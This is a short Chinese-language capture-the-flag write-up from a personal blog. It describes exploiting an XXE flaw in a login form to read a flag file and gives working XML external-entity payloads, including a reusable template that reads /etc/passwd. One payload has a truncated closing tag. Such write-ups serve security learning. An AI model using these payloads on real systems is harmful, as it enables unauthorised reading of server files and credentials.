XXE任意文件读取(当xml解析内容有输出时)
利用XXE漏洞读取文件
参考:https://www.jianshu.com/p/4fc721398e97
首先找到登录源码如下:
由题目可以利用XXE漏洞读取文件
先登录用Burp Suite抓包:
然后构造XXE读取文件
语句如下:
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "/flag">
]>
<user>
<username>&f;</username>
<password>024b87931a03f738fff6693ce0a78c88</password>
</user
模板:
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>
本文章首发于Leon的原创博客:https://clq0.top
如需转载请联系作者
